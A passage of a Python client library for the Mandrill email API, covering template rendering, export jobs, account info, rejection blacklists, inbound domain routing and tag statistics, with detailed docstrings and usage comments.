[].subject (string): the subject line of the template, if provided - draft version
[].from_email (string): the default sender address for the template, if provided - draft version
[].from_name (string): the default sender from name for the template, if provided - draft version
[].text (string): the default text part of messages sent with the template, if provided - draft version
[].publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
[].publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
[].publish_subject (string): the subject line of the template, if provided
[].publish_from_email (string): the default sender address for the template, if provided
[].publish_from_name (string): the default sender from name for the template, if provided
[].publish_text (string): the default text part of messages sent with the template, if provided
[].published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
[].created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'label': label}
return self.master.call('templates/list', _params)
def time_series(self, name):
"""Return the recent history (hourly stats for the last 30 days) for a template
Args:
name (string): the name of an existing template
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/time-series', _params)
def render(self, template_name, template_content, merge_vars=None):
"""Inject content and optionally merge fields into a template, returning the HTML that results
Args:
template_name (string): the immutable name of a template that exists in the user's account
template_content (array): an array of template content to render. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block::
template_content[] (struct): the injection of a single piece of content into a single editable region::
template_content[].name (string): the name of the mc:edit editable region to inject into
template_content[].content (string): the content to inject
merge_vars (array): optional merge variables to use for injecting merge field content. If this is not provided, no merge fields will be replaced.::
merge_vars[] (struct): a single merge variable::
merge_vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _
merge_vars[].content (string): the merge variable's content
Returns:
struct. the result of rendering the given template with the content and merge field values injected::
html (string): the rendered HTML as a string
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'template_name': template_name, 'template_content': template_content, 'merge_vars': merge_vars}
return self.master.call('templates/render', _params)
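    # Render sketch (hypothetical template named 'welcome' with an mc:edit
    # region called 'main'; the merge variable name is illustrative):
    #
    #   result = m.templates.render(
    #       'welcome',
    #       [{'name': 'main', 'content': '<p>Hello</p>'}],
    #       merge_vars=[{'name': 'FNAME', 'content': 'Ana'}])
    #   html = result['html']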
class Exports(object):
def __init__(self, master):
self.master = master
def info(self, id):
"""Returns information about an export job. If the export job's state is 'complete',
the returned data will include a URL you can use to fetch the results. Every export
job produces a zip archive, but the format of the archive is distinct for each job
type. The api calls that initiate exports include more details about the output format
for that job type.
Args:
id (string): an export job identifier
Returns:
struct. the information about the export::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job - activity, reject, or whitelist
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format
state (string): the export job's state - waiting, working, complete, error, or expired.
result_url (string): the url for the export job's results, if the job is completed.
Raises:
UnknownExportError: The requested export job does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('exports/info', _params)
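    # Polling sketch: exports run asynchronously, so start a job (see rejects,
    # whitelist, or activity below) and poll info() until it finishes:
    #
    #   job = m.exports.rejects(notify_email='ops@example.com')  # address is hypothetical
    #   while m.exports.info(job['id'])['state'] not in ('complete', 'error', 'expired'):
    #       time.sleep(5)
    #   url = m.exports.info(job['id'])['result_url']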
def list(self, ):
"""Returns a list of your exports.
Returns:
array. the account's exports::
[] (struct): the individual export info::
[].id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
[].created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].type (string): the type of the export job - activity, reject, or whitelist
[].finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format
[].state (string): the export job's state - waiting, working, complete, error, or expired.
[].result_url (string): the url for the export job's results, if the job is completed.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('exports/list', _params)
def rejects(self, notify_email=None):
"""Begins an export of your rejection blacklist. The blacklist will be exported to a zip archive
        containing a single file named rejects.csv that includes the following fields: email,
        reason, detail, created_at, expires_at, last_event_at.
Args:
notify_email (string): an optional email address to notify when the export job has finished.
Returns:
struct. information about the rejects export job that was started::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run
state (string): the export job's state
result_url (string): the url for the export job's results, if the job is complete
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'notify_email': notify_email}
return self.master.call('exports/rejects', _params)
def whitelist(self, notify_email=None):
"""Begins an export of your rejection whitelist. The whitelist will be exported to a zip archive
containing a single file named whitelist.csv that includes the following fields:
email, detail, created_at.
Args:
notify_email (string): an optional email address to notify when the export job has finished.
Returns:
struct. information about the whitelist export job that was started::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run
state (string): the export job's state
result_url (string): the url for the export job's results, if the job is complete
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'notify_email': notify_email}
return self.master.call('exports/whitelist', _params)
def activity(self, notify_email=None, date_from=None, date_to=None, tags=None, senders=None, states=None, api_keys=None):
"""Begins an export of your activity history. The activity will be exported to a zip archive
containing a single file named activity.csv in the same format as you would be able to export
from your account's activity view. It includes the following fields: Date, Email Address,
Sender, Subject, Status, Tags, Opens, Clicks, Bounce Detail. If you have configured any custom
metadata fields, they will be included in the exported data.
Args:
notify_email (string): an optional email address to notify when the export job has finished
date_from (string): start date as a UTC string in YYYY-MM-DD HH:MM:SS format
date_to (string): end date as a UTC string in YYYY-MM-DD HH:MM:SS format
tags (array): an array of tag names to narrow the export to; will match messages that contain ANY of the tags::
tags[] (string): a tag name
senders (array): an array of senders to narrow the export to::
senders[] (string): a sender address
states (array): an array of states to narrow the export to; messages with ANY of the states will be included::
states[] (string): a message state
            api_keys (array): an array of api keys to narrow the export to; messages sent with ANY of the keys will be included::
api_keys[] (string): an API key associated with your account
Returns:
struct. information about the activity export job that was started::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run
state (string): the export job's state
result_url (string): the url for the export job's results, if the job is complete
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'notify_email': notify_email, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders, 'states': states, 'api_keys': api_keys}
return self.master.call('exports/activity', _params)
class Users(object):
def __init__(self, master):
self.master = master
def info(self, ):
"""Return the information about the API-connected user
Returns:
struct. the user information including username, key, reputation, quota, and historical sending stats::
username (string): the username of the user (used for SMTP authentication)
created_at (string): the date and time that the user's Mandrill account was created as a UTC string in YYYY-MM-DD HH:MM:SS format
public_id (string): a unique, permanent identifier for this user
reputation (integer): the reputation of the user on a scale from 0 to 100, with 75 generally being a "good" reputation
hourly_quota (integer): the maximum number of emails Mandrill will deliver for this user each hour. Any emails beyond that will be accepted and queued for later delivery. Users with higher reputations will have higher hourly quotas
backlog (integer): the number of emails that are queued for delivery due to exceeding your monthly or hourly quotas
stats (struct): an aggregate summary of the account's sending stats::
stats.today (struct): stats for this user so far today::
stats.today.sent (integer): the number of emails sent for this user so far today
stats.today.hard_bounces (integer): the number of emails hard bounced for this user so far today
stats.today.soft_bounces (integer): the number of emails soft bounced for this user so far today
stats.today.rejects (integer): the number of emails rejected for sending this user so far today
stats.today.complaints (integer): the number of spam complaints for this user so far today
stats.today.unsubs (integer): the number of unsubscribes for this user so far today
stats.today.opens (integer): the number of times emails have been opened for this user so far today
stats.today.unique_opens (integer): the number of unique opens for emails sent for this user so far today
stats.today.clicks (integer): the number of URLs that have been clicked for this user so far today
stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this user so far today
stats.last_7_days (struct): stats for this user in the last 7 days::
stats.last_7_days.sent (integer): the number of emails sent for this user in the last 7 days
stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 7 days
stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 7 days
stats.last_7_days.rejects (integer): the number of emails rejected for sending this user in the last 7 days
stats.last_7_days.complaints (integer): the number of spam complaints for this user in the last 7 days
stats.last_7_days.unsubs (integer): the number of unsubscribes for this user in the last 7 days
stats.last_7_days.opens (integer): the number of times emails have been opened for this user in the last 7 days
stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 7 days
stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this user in the last 7 days
stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 7 days
stats.last_30_days (struct): stats for this user in the last 30 days::
stats.last_30_days.sent (integer): the number of emails sent for this user in the last 30 days
stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 30 days
stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 30 days
stats.last_30_days.rejects (integer): the number of emails rejected for sending this user in the last 30 days
stats.last_30_days.complaints (integer): the number of spam complaints for this user in the last 30 days
stats.last_30_days.unsubs (integer): the number of unsubscribes for this user in the last 30 days
stats.last_30_days.opens (integer): the number of times emails have been opened for this user in the last 30 days
stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 30 days
stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this user in the last 30 days
stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 30 days
stats.last_60_days (struct): stats for this user in the last 60 days::
stats.last_60_days.sent (integer): the number of emails sent for this user in the last 60 days
stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 60 days
stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 60 days
stats.last_60_days.rejects (integer): the number of emails rejected for sending this user in the last 60 days
stats.last_60_days.complaints (integer): the number of spam complaints for this user in the last 60 days
stats.last_60_days.unsubs (integer): the number of unsubscribes for this user in the last 60 days
stats.last_60_days.opens (integer): the number of times emails have been opened for this user in the last 60 days
stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 60 days
stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this user in the last 60 days
stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 60 days
stats.last_90_days (struct): stats for this user in the last 90 days::
stats.last_90_days.sent (integer): the number of emails sent for this user in the last 90 days
stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 90 days
stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 90 days
stats.last_90_days.rejects (integer): the number of emails rejected for sending this user in the last 90 days
stats.last_90_days.complaints (integer): the number of spam complaints for this user in the last 90 days
stats.last_90_days.unsubs (integer): the number of unsubscribes for this user in the last 90 days
stats.last_90_days.opens (integer): the number of times emails have been opened for this user in the last 90 days
stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 90 days
stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this user in the last 90 days
stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 90 days
stats.all_time (struct): stats for the lifetime of the user's account::
stats.all_time.sent (integer): the number of emails sent in the lifetime of the user's account
stats.all_time.hard_bounces (integer): the number of emails hard bounced in the lifetime of the user's account
stats.all_time.soft_bounces (integer): the number of emails soft bounced in the lifetime of the user's account
            stats.all_time.rejects (integer): the number of emails rejected for sending in the lifetime of the user's account
stats.all_time.complaints (integer): the number of spam complaints in the lifetime of the user's account
stats.all_time.unsubs (integer): the number of unsubscribes in the lifetime of the user's account
stats.all_time.opens (integer): the number of times emails have been opened in the lifetime of the user's account
stats.all_time.unique_opens (integer): the number of unique opens for emails sent in the lifetime of the user's account
stats.all_time.clicks (integer): the number of URLs that have been clicked in the lifetime of the user's account
stats.all_time.unique_clicks (integer): the number of unique clicks for emails sent in the lifetime of the user's account
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/info', _params)
def ping(self, ):
"""Validate an API key and respond to a ping
Returns:
string. the string "PONG!"
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/ping', _params)
def ping2(self):
"""Validate an API key and respond to a ping (anal JSON parser version)
Returns:
struct. a struct with one key "PING" with a static value "PONG!"
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/ping2', _params)
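# Usage sketch (illustrative, not part of the client): a key check at startup.
# This assumes the master `Mandrill` class exposes this wrapper as the
# lowercase attribute `users`, as in the released library; the key is a
# placeholder.
#
#     import mandrill
#     client = mandrill.Mandrill('YOUR_API_KEY')
#     try:
#         assert client.users.ping() == 'PONG!'
#     except mandrill.InvalidKeyError:
#         raise SystemExit('Mandrill rejected the API key')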
def senders(self):
"""Return the senders that have tried to use this account, both verified and unverified
Returns:
array. an array of sender data, one for each sending address used by the account::
[] (struct): the information on each sending address in the account::
[].address (string): the sender's email address
[].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the total number of messages sent by this sender
[].hard_bounces (integer): the total number of hard bounces on messages sent by this sender
[].soft_bounces (integer): the total number of soft bounces on messages sent by this sender
[].rejects (integer): the total number of rejected messages by this sender
[].complaints (integer): the total number of spam complaints received for messages by this sender
[].unsubs (integer): the total number of unsubscribe requests received for messages by this sender
[].opens (integer): the total number of times messages by this sender have been opened
[].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
[].unique_opens (integer): the number of unique opens for emails sent for this sender
[].unique_clicks (integer): the number of unique clicks for emails sent for this sender
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/senders', _params)
class Rejects(object):
def __init__(self, master):
self.master = master
def add(self, email, comment=None, subaccount=None):
"""Adds an email to your email rejection blacklist. Addresses that you
add manually will never expire and there is no reputation penalty
for removing them from your blacklist. Attempting to blacklist an
address that has been whitelisted will have no effect.
Args:
email (string): an email address to block
comment (string): an optional comment describing the rejection
subaccount (string): an optional unique identifier for the subaccount to limit the blacklist entry
Returns:
struct. a status object containing the address and the result of the operation::
email (string): the email address you provided
added (boolean): whether the operation succeeded
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'email': email, 'comment': comment, 'subaccount': subaccount}
return self.master.call('rejects/add', _params)
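# Usage sketch (illustrative): manually blacklist an address. `client` is a
# configured `mandrill.Mandrill` instance as in the sketch above; the address
# and comment are placeholders.
#
#     result = client.rejects.add(email='complainer@example.com',
#                                 comment='manual block after abuse report')
#     print('%s added=%s' % (result['email'], result['added']))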
def list(self, email=None, include_expired=False, subaccount=None):
"""Retrieves your email rejection blacklist. You can provide an email
address to limit the results. Returns up to 1000 results. By default,
entries that have expired are excluded from the results; set
include_expired to true to include them.
Args:
email (string): an optional email address to search by
include_expired (boolean): whether to include rejections that have already expired.
subaccount (string): an optional unique identifier for the subaccount to limit the blacklist
Returns:
array. Up to 1000 rejection entries::
[] (struct): the information for each rejection blacklist entry::
[].email (string): the email that is blocked
[].reason (string): the type of event (hard-bounce, soft-bounce, spam, unsub) that caused this rejection
[].detail (string): extended details about the event, such as the SMTP diagnostic for bounces or the comment for manually-created rejections
[].created_at (string): when the email was added to the blacklist
[].last_event_at (string): the timestamp of the most recent event that either created or renewed this rejection
[].expires_at (string): when the blacklist entry will expire (this may be in the past)
[].expired (boolean): whether the blacklist entry has expired
[].sender (struct): the sender that this blacklist entry applies to, or null if none.::
[].sender.address (string): the sender's email address
[].sender.created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sender.sent (integer): the total number of messages sent by this sender
[].sender.hard_bounces (integer): the total number of hard bounces on messages sent by this sender
[].sender.soft_bounces (integer): the total number of soft bounces on messages sent by this sender
[].sender.rejects (integer): the total number of rejected messages by this sender
[].sender.complaints (integer): the total number of spam complaints received for messages by this sender
[].sender.unsubs (integer): the total number of unsubscribe requests received for messages by this sender
[].sender.opens (integer): the total number of times messages by this sender have been opened
[].sender.clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
[].sender.unique_opens (integer): the number of unique opens for emails sent for this sender
[].sender.unique_clicks (integer): the number of unique clicks for emails sent for this sender
[].subaccount (string): the subaccount that this blacklist entry applies to, or null if none.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'email': email, 'include_expired': include_expired, 'subaccount': subaccount}
return self.master.call('rejects/list', _params)
def delete(self, email, subaccount=None):
"""Deletes an email rejection. There is no limit to how many rejections
you can remove from your blacklist, but keep in mind that each deletion
has an effect on your reputation.
Args:
email (string): an email address
subaccount (string): an optional unique identifier for the subaccount to limit the blacklist deletion
Returns:
struct. a status object containing the address and whether the deletion succeeded.::
email (string): the email address that was removed from the blacklist
deleted (boolean): whether the address was deleted successfully.
subaccount (string): the subaccount blacklist that the address was removed from, if any
Raises:
InvalidRejectError: The requested email is not in the rejection list
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'email': email, 'subaccount': subaccount}
return self.master.call('rejects/delete', _params)
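# Usage sketch (illustrative): sweep expired entries off the blacklist by
# combining list and delete. Field names follow the structs documented above;
# `client` is assumed as before.
#
#     for entry in client.rejects.list(include_expired=True):
#         if entry['expired']:
#             client.rejects.delete(email=entry['email'],
#                                   subaccount=entry.get('subaccount'))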
class Inbound(object):
def __init__(self, master):
self.master = master
def domains(self):
"""List the domains that have been configured for inbound delivery
Returns:
array. the inbound domains associated with the account::
[] (struct): the individual domain info::
[].domain (string): the domain name that is accepting mail
[].created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
[].valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('inbound/domains', _params)
def add_domain(self, domain):
"""Add an inbound domain to your account
Args:
domain (string): a domain name
Returns:
struct. information about the domain::
domain (string): the domain name that is accepting mail
created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/add-domain', _params)
def check_domain(self, domain):
"""Check the MX settings for an inbound domain. The domain must have already been added with the add-domain call
Args:
domain (string): an existing inbound domain
Returns:
struct. information about the inbound domain::
domain (string): the domain name that is accepting mail
created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/check-domain', _params)
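# Usage sketch (illustrative): register an inbound domain and poll check-domain
# until the MX record is visible. The domain is a placeholder; the polling
# interval is arbitrary.
#
#     import time
#     client.inbound.add_domain(domain='inbound.example.com')
#     while not client.inbound.check_domain(domain='inbound.example.com')['valid_mx']:
#         time.sleep(60)  # wait for the DNS change to propagate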
def delete_domain(self, domain):
"""Delete an inbound domain from the account. All mail will stop routing for this domain immediately.
Args:
domain (string): an existing inbound domain
Returns:
struct. information about the deleted domain::
domain (string): the domain name that is accepting mail
created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/delete-domain', _params)
def routes(self, domain):
"""List the mailbox routes defined for an inbound domain
Args:
domain (string): the domain to check
Returns:
array. the routes associated with the domain::
[] (struct): the individual mailbox route::
[].id (string): the unique identifier of the route
[].pattern (string): the search pattern that the mailbox name should match
[].url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/routes', _params)
def add_route(self, domain, pattern, url):
"""Add a new mailbox route to an inbound domain
Args:
domain (string): an existing inbound domain
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where the inbound messages will be published
Returns:
struct. the added mailbox route information::
id (string): the unique identifier of the route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain, 'pattern': pattern, 'url': url}
return self.master.call('inbound/add-route', _params)
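# Usage sketch (illustrative): publish mailboxes matching a hypothetical
# pattern to a webhook, keeping the returned id for later update-route or
# delete-route calls.
#
#     route = client.inbound.add_route(domain='inbound.example.com',
#                                      pattern='support*',
#                                      url='https://app.example.com/hooks/inbound')
#     print('route id: %s' % route['id'])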
def update_route(self, id, pattern=None, url=None):
"""Update the pattern or webhook of an existing inbound mailbox route. If null is provided for any fields, the values will remain unchanged.
Args:
id (string): the unique identifier of an existing mailbox route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where the inbound messages will be published
Returns:
struct. the updated mailbox route information::
id (string): the unique identifier of the route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundRouteError: The provided inbound route does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'pattern': pattern, 'url': url}
return self.master.call('inbound/update-route', _params)
def delete_route(self, id):
"""Delete an existing inbound mailbox route
Args:
id (string): the unique identifier of an existing route
Returns:
struct. the deleted mailbox route information::
id (string): the unique identifier of the route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundRouteError: The provided inbound route does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('inbound/delete-route', _params)
def send_raw(self, raw_message, to=None, mail_from=None, helo=None, client_address=None):
"""Take a raw MIME document destined for a domain with inbound domains set up, and send it to the inbound hook exactly as if it had been sent over SMTP
Args:
raw_message (string): the full MIME document of an email message
to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document::
to[] (string): the email address of the recipient
mail_from (string): the address specified in the MAIL FROM stage of the SMTP conversation. Required for the SPF check.
helo (string): the identification provided by the client MTA in the HELO stage of the SMTP conversation. Required for the SPF check.
client_address (string): the remote MTA's IP address. Optional, but required for the SPF check.
Returns:
array. an array of the information for each recipient in the message (usually one) that matched an inbound route::
[] (struct): the individual recipient information::
[].email (string): the email address of the matching recipient
[].pattern (string): the mailbox route pattern that the recipient matched
[].url (string): the webhook URL that the message was posted to
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'raw_message': raw_message, 'to': to, 'mail_from': mail_from, 'helo': helo, 'client_address': client_address}
return self.master.call('inbound/send-raw', _params)
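# Usage sketch (illustrative): exercise the routes end to end by replaying a
# minimal raw MIME message, exactly as if it had arrived over SMTP.
#
#     raw = ('From: sender@example.org\r\n'
#            'To: support@inbound.example.com\r\n'
#            'Subject: route test\r\n'
#            '\r\n'
#            'hello')
#     for hit in client.inbound.send_raw(raw_message=raw,
#                                        to=['support@inbound.example.com']):
#         print('%s -> %s' % (hit['pattern'], hit['url']))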
class Tags(object):
def __init__(self, master):
self.master = master
def list(self):
"""Return all of the user-defined tag information
Returns:
array. a list of user-defined tags::
[] (struct): a user-defined tag::
[].tag (string): the actual tag as a string
[].reputation (integer): the tag's current reputation on a scale from 0 to 100.
[].sent (integer): the total number of messages sent with this tag
[].hard_bounces (integer): the total number of hard bounces on messages with this tag
[].soft_bounces (integer): the total number of soft bounces on messages with this tag
[].rejects (integer): the total number of rejected messages with this tag
[].complaints (integer): the total number of spam complaints received for messages with this tag
[].unsubs (integer): the total number of unsubscribe requests received for messages with this tag
[].opens (integer): the total number of times messages with this tag have been opened
[].clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked
[].unique_opens (integer): the number of unique opens for emails sent with this tag
[].unique_clicks (integer): the number of unique clicks for emails sent with this tag
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('tags/list', _params)
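# Usage sketch (illustrative): flag tags whose reputation has slipped, using
# the struct documented above. The threshold is arbitrary.
#
#     for tag in client.tags.list():
#         if tag['reputation'] < 50:
#             print('low reputation: %s (%d)' % (tag['tag'], tag['reputation']))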
def delete(self, tag):
"""Deletes a tag permanently. Deleting a tag removes the tag from any messages
that have been sent, and also deletes the tag's stats. There is no way to
undo this operation, so use it carefully.
Args:
tag (string): a tag name
Returns:
struct. the tag that was deleted::
tag (string): the actual tag as a string
reputation (integer): the tag's current reputation on a scale from 0 to 100.
sent (integer): the total number of messages sent with this tag
hard_bounces (integer): the total number of hard bounces on messages with this tag
soft_bounces (integer): the total number of soft bounces on messages with this tag
rejects (integer): the total number of rejected messages with this tag
complaints (integer): the total number of spam complaints received for messages with this tag
unsubs (integer): the total number of unsubscribe requests received for messages with this tag
opens (integer): the total number of times messages with this tag have been opened
clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked
unique_opens (integer): the number of unique opens for emails sent with this tag
unique_clicks (integer): the number of unique clicks for emails sent with this tag
Raises:
InvalidTagNameError: The requested tag does not exist or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'tag': tag}
return self.master.call('tags/delete', _params)
def info(self, tag):
"""Return more detailed information about a single tag, including aggregates of recent stats
Args:
tag (string): an existing tag name
Returns:
struct. the detailed information on the tag::
tag (string): the actual tag as a string
sent (integer): the total number of messages sent with this tag
hard_bounces (integer): the total number of hard bounces on messages with this tag
soft_bounces (integer): the total number of soft bounces on messages with this tag
rejects (integer): the total number of rejected messages with this tag
complaints (integer): the total number of spam complaints received for messages with this tag
unsubs (integer): the total number of unsubscribe requests received for messages with this tag
opens (integer): the total number of times messages with this tag have been opened
clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked
stats (struct): an aggregate summary of the tag's sending stats::
stats.today (struct): stats with this tag so far today::
stats.today.sent (integer): the number of emails sent with this tag so far today
stats.today.hard_bounces (integer): the number of emails hard bounced with this tag so far today
stats.today.soft_bounces (integer): the number of emails soft bounced with this tag so far today
stats.today.rejects (integer): the number of emails rejected with this tag so far today
stats.today.complaints (integer): the number of spam complaints with this tag so far today
stats.today.unsubs (integer): the number of unsubscribes with this tag so far today
stats.today.opens (integer): the number of times emails have been opened with this tag so far today
stats.today.unique_opens (integer): the number of unique opens for emails sent with this tag so far today
stats.today.clicks (integer): the number of URLs that have been clicked with this tag so far today
stats.today.unique_clicks (integer): the number of unique clicks for emails sent with this tag so far today
stats.last_7_days (struct): stats with this tag in the last 7 days::
stats.last_7_days.sent (integer): the number of emails sent with this tag in the last 7 days
stats.last_7_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 7 days
stats.last_7_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 7 days
stats.last_7_days.rejects (integer): the number of emails rejected with this tag in the last 7 days
stats.last_7_days.complaints (integer): the number of spam complaints with this tag in the last 7 days
stats.last_7_days.unsubs (integer): the number of unsubscribes with this tag in the last 7 days
